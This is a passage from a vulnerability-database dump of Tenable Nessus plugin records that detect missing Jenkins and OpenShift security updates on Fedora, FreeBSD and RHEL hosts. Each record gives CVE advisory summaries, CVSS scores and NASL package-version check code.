reference:\"php-mbstring-5.3.3-46.el6_7.1\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"php-process-5.3.3-46.el6_7.1\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"rubygem-openshift-origin-common-1.29.5.2-1.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"rubygem-openshift-origin-frontend-apache-vhost-0.13.2.1-1.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"rubygem-openshift-origin-node-1.38.5.3-1.el6\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"activemq-client / jenkins / openshift-enterprise-release / etc\");\n }\n}\n", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-11-01T02:27:24", "bulletinFamily": "scanner", "description": "Security update, fixes: CVE-2015-5317 (SECURITY-153), CVE-2015-5319\n(SECURITY-173), CVE-2015-5324 (SECURITY-186), CVE-2015-5321\n(SECURITY-192), CVE-2015-5322 (SECURITY-195), CVE-2015-5323\n(SECURITY-200), CVE-2015-5326 (SECURITY-214)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "modified": "2019-11-02T00:00:00", "id": "FEDORA_2015-89468612F5.NASL", "href": "https://www.tenable.com/plugins/nessus/89311", "published": "2016-03-04T00:00:00", "title": "Fedora 22 : jenkins-1.609.3-4.fc22 (2015-89468612f5)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2015-89468612f5.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(89311);\n script_version(\"$Revision: 2.1 $\");\n script_cvs_date(\"$Date: 2016/03/04 16:00:58 $\");\n\n script_xref(name:\"FEDORA\", value:\"2015-89468612f5\");\n\n script_name(english:\"Fedora 22 : jenkins-1.609.3-4.fc22 (2015-89468612f5)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Security update, fixes: CVE-2015-5317 (SECURITY-153), CVE-2015-5319\n(SECURITY-173), CVE-2015-5324 (SECURITY-186), CVE-2015-5321\n(SECURITY-192), CVE-2015-5322 (SECURITY-195), CVE-2015-5323\n(SECURITY-200), CVE-2015-5326 (SECURITY-214)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2015-December/174273.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?849631a4\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected jenkins package.\"\n );\n script_set_attribute(attribute:\"risk_factor\", value:\"High\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:jenkins\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:22\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/12/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/03/04\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^22([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 22.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC22\", reference:\"jenkins-1.609.3-4.fc22\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"jenkins\");\n}\n", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2019-11-01T02:37:13", "bulletinFamily": "scanner", "description": "Jenkins Security Advisory : DescriptionSECURITY-95 / CVE-2015-7536\n(Stored XSS vulnerability through workspace files and archived\nartifacts) In certain configurations, low privilege users were able to\ncreate e.g. HTML files in workspaces and archived artifacts that could\nresult in XSS when accessed by other users. Jenkins now sends\nContent-Security-Policy headers that enables sandboxing and prohibits\nscript execution by default. SECURITY-225 / CVE-2015-7537 (CSRF\nvulnerability in some administrative actions) Several\nadministration/configuration related URLs could be accessed using GET,\nwhich allowed attackers to circumvent CSRF protection. SECURITY-233 /\nCVE-2015-7538 (CSRF protection ineffective) Malicious users were able\nto circumvent CSRF protection on any URL by sending specially crafted\nPOST requests. SECURITY-234 / CVE-2015-7539 (Jenkins plugin manager\nvulnerable to MITM attacks) While the Jenkins update site data is\ndigitally signed, and the signature verified by Jenkins, Jenkins did\nnot verify the provided SHA-1 checksums for the plugin files\nreferenced in the update site data. This enabled MITM attacks on the\nplugin manager, resulting in installation of attacker-provided\nplugins.", "modified": "2019-11-02T00:00:00", "id": "FREEBSD_PKG_23AF04259EAC11E5B93700E0814CAB4E.NASL", "href": "https://www.tenable.com/plugins/nessus/87292", "published": "2015-12-10T00:00:00", "title": "FreeBSD : jenkins -- multiple vulnerabilities (23af0425-9eac-11e5-b937-00e0814cab4e)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2018 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(87292);\n script_version(\"1.2\");\n script_cvs_date(\"Date: 2018/11/10 11:49:44\");\n\n script_name(english:\"FreeBSD : jenkins -- multiple vulnerabilities (23af0425-9eac-11e5-b937-00e0814cab4e)\");\n script_summary(english:\"Checks for updated packages in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote FreeBSD host is missing one or more security-related\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Jenkins Security Advisory : DescriptionSECURITY-95 / CVE-2015-7536\n(Stored XSS vulnerability through workspace files and archived\nartifacts) In certain configurations, low privilege users were able to\ncreate e.g. HTML files in workspaces and archived artifacts that could\nresult in XSS when accessed by other users. Jenkins now sends\nContent-Security-Policy headers that enables sandboxing and prohibits\nscript execution by default. SECURITY-225 / CVE-2015-7537 (CSRF\nvulnerability in some administrative actions) Several\nadministration/configuration related URLs could be accessed using GET,\nwhich allowed attackers to circumvent CSRF protection. SECURITY-233 /\nCVE-2015-7538 (CSRF protection ineffective) Malicious users were able\nto circumvent CSRF protection on any URL by sending specially crafted\nPOST requests. SECURITY-234 / CVE-2015-7539 (Jenkins plugin manager\nvulnerable to MITM attacks) While the Jenkins update site data is\ndigitally signed, and the signature verified by Jenkins, Jenkins did\nnot verify the provided SHA-1 checksums for the plugin files\nreferenced in the update site data. This enabled MITM attacks on the\nplugin manager, resulting in installation of attacker-provided\nplugins.\"\n );\n # https://wiki.jenkins-ci.org/display/SECURITY/Jenkins+Security+Advisory+2015-12-09\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?7ce23a1d\"\n );\n # https://vuxml.freebsd.org/freebsd/23af0425-9eac-11e5-b937-00e0814cab4e.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?4b856ce9\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_attribute(attribute:\"risk_factor\", value:\"High\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:jenkins\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:jenkins-lts\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/12/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/12/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/12/10\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"jenkins<=1.641\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"jenkins-lts<=1.625.3\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-11-01T02:27:25", "bulletinFamily": "scanner", "description": "Update to latest LTS release 1.625.3. This update fixes CVE-2015-7536,\nCVE-2015-7537, CVE-2015-7538, CVE-2015-7539.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "modified": "2019-11-02T00:00:00", "id": "FEDORA_2015-D7E5461DBF.NASL", "href": "https://www.tenable.com/plugins/nessus/89428", "published": "2016-03-04T00:00:00", "title": "Fedora 23 : jenkins-1.625.3-1.fc23 (2015-d7e5461dbf)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2015-d7e5461dbf.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(89428);\n script_version(\"$Revision: 1.2 $\");\n script_cvs_date(\"$Date: 2016/10/18 16:42:53 $\");\n\n script_cve_id(\"CVE-2015-7536\", \"CVE-2015-7537\", \"CVE-2015-7538\", \"CVE-2015-7539\");\n script_xref(name:\"FEDORA\", value:\"2015-d7e5461dbf\");\n\n script_name(english:\"Fedora 23 : jenkins-1.625.3-1.fc23 (2015-d7e5461dbf)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Update to latest LTS release 1.625.3. This update fixes CVE-2015-7536,\nCVE-2015-7537, CVE-2015-7538, CVE-2015-7539.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2016-January/174897.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?ecfb9968\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected jenkins package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:jenkins\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:23\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/01/04\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/03/04\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^23([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 23.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC23\", reference:\"jenkins-1.625.3-1.fc23\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"jenkins\");\n}\n", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-11-01T02:27:25", "bulletinFamily": "scanner", "description": "Security update, fixes: CVE-2015-7536 (SECURITY-95), CVE-2015-7537\n(SECURITY-225), CVE-2015-7538 (SECURITY-233), CVE-2015-7539\n(SECURITY-234)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "modified": "2019-11-02T00:00:00", "id": "FEDORA_2015-938C70C840.NASL", "href": "https://www.tenable.com/plugins/nessus/89328", "published": "2016-03-04T00:00:00", "title": "Fedora 22 : jenkins-1.609.3-5.fc22 (2015-938c70c840)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2015-938c70c840.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(89328);\n script_version(\"$Revision: 1.1 $\");\n script_cvs_date(\"$Date: 2016/03/04 16:10:31 $\");\n\n script_xref(name:\"FEDORA\", value:\"2015-938c70c840\");\n\n script_name(english:\"Fedora 22 : jenkins-1.609.3-5.fc22 (2015-938c70c840)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Security update, fixes: CVE-2015-7536 (SECURITY-95), CVE-2015-7537\n(SECURITY-225), CVE-2015-7538 (SECURITY-233), CVE-2015-7539\n(SECURITY-234)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2016-January/174917.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?10425b6e\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected jenkins package.\"\n );\n script_set_attribute(attribute:\"risk_factor\", value:\"High\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:jenkins\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:22\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/01/04\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/03/04\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^22([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 22.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC22\", reference:\"jenkins-1.609.3-5.fc22\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"jenkins\");\n}\n", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-11-01T02:27:25", "bulletinFamily": "scanner", "description": "Fix CVE-2015-5318, CVE-2015-5320, CVE-2015-5325, SECURITY-218\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "modified": "2019-11-02T00:00:00", "id": "FEDORA_2015-A433D8BA72.NASL", "href": "https://www.tenable.com/plugins/nessus/89353", "published": "2016-03-04T00:00:00", "title": "Fedora 22 : jenkins-1.609.3-3.fc22 / jenkins-remoting-2.53-1.fc22 (2015-a433d8ba72)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2015-a433d8ba72.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(89353);\n script_version(\"$Revision: 1.1 $\");\n script_cvs_date(\"$Date: 2016/03/04 16:10:31 $\");\n\n script_xref(name:\"FEDORA\", value:\"2015-a433d8ba72\");\n\n script_name(english:\"Fedora 22 : jenkins-1.609.3-3.fc22 / jenkins-remoting-2.53-1.fc22 (2015-a433d8ba72)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Fix CVE-2015-5318, CVE-2015-5320, CVE-2015-5325, SECURITY-218\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2015-November/172686.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?51b600a0\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2015-November/172687.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?69e56c44\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected jenkins and / or jenkins-remoting packages.\"\n );\n script_set_attribute(attribute:\"risk_factor\", value:\"High\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:jenkins\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:jenkins-remoting\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:22\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/11/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/03/04\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^22([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 22.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC22\", reference:\"jenkins-1.609.3-3.fc22\")) flag++;\nif (rpm_check(release:\"FC22\", reference:\"jenkins-remoting-2.53-1.fc22\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"jenkins / jenkins-remoting\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-11-01T03:21:05", "bulletinFamily": "scanner", "description": "Red Hat OpenShift Enterprise release 3.1.1 is now available with\nupdates to packages that fix several security issues, bugs and\nintroduce feature enhancements.\n\nRed Hat Product Security has rated this update as having Important\nsecurity impact. Common Vulnerability Scoring System (CVSS) base\nscores, which give detailed severity ratings, are available for each\nvulnerability from the CVE links in the References section.\n\nOpenShift Enterprise by Red Hat is the company", "modified": "2019-11-02T00:00:00", "id": "REDHAT-RHSA-2016-0070.NASL", "href": "https://www.tenable.com/plugins/nessus/119442", "published": "2018-12-06T00:00:00", "title": "RHEL 7 : openshift (RHSA-2016:0070)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2016:0070. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(119442);\n script_version(\"1.6\");\n script_cvs_date(\"Date: 2019/10/24 15:35:41\");\n\n script_cve_id(\"CVE-2013-2186\", \"CVE-2014-1869\", \"CVE-2014-3661\", \"CVE-2014-3662\", \"CVE-2014-3663\", \"CVE-2014-3664\", \"CVE-2014-3666\", \"CVE-2014-3667\", \"CVE-2014-3680\", \"CVE-2014-3681\", \"CVE-2015-1806\", \"CVE-2015-1807\", \"CVE-2015-1808\", \"CVE-2015-1810\", \"CVE-2015-1812\", \"CVE-2015-1813\", \"CVE-2015-1814\", \"CVE-2015-5317\", \"CVE-2015-5318\", \"CVE-2015-5319\", \"CVE-2015-5320\", \"CVE-2015-5321\", \"CVE-2015-5322\", \"CVE-2015-5323\", \"CVE-2015-5324\", \"CVE-2015-5325\", \"CVE-2015-5326\", \"CVE-2015-7537\", \"CVE-2015-7538\", \"CVE-2015-7539\", \"CVE-2015-8103\", \"CVE-2016-1905\", \"CVE-2016-1906\");\n script_xref(name:\"RHSA\", value:\"2016:0070\");\n script_xref(name:\"TRA\", value:\"TRA-2016-23\");\n\n script_name(english:\"RHEL 7 : openshift (RHSA-2016:0070)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Red Hat OpenShift Enterprise release 3.1.1 is now available with\nupdates to packages that fix several security issues, bugs and\nintroduce feature enhancements.\n\nRed Hat Product Security has rated this update as having Important\nsecurity impact. Common Vulnerability Scoring System (CVSS) base\nscores, which give detailed severity ratings, are available for each\nvulnerability from the CVE links in the References section.\n\nOpenShift Enterprise by Red Hat is the company's cloud computing\nPlatform-as-a-Service (PaaS) solution designed for on-premise or\nprivate cloud deployments.\n\nThe following security issues are addressed with this release :\n\nAn authorization flaw was discovered in Kubernetes; 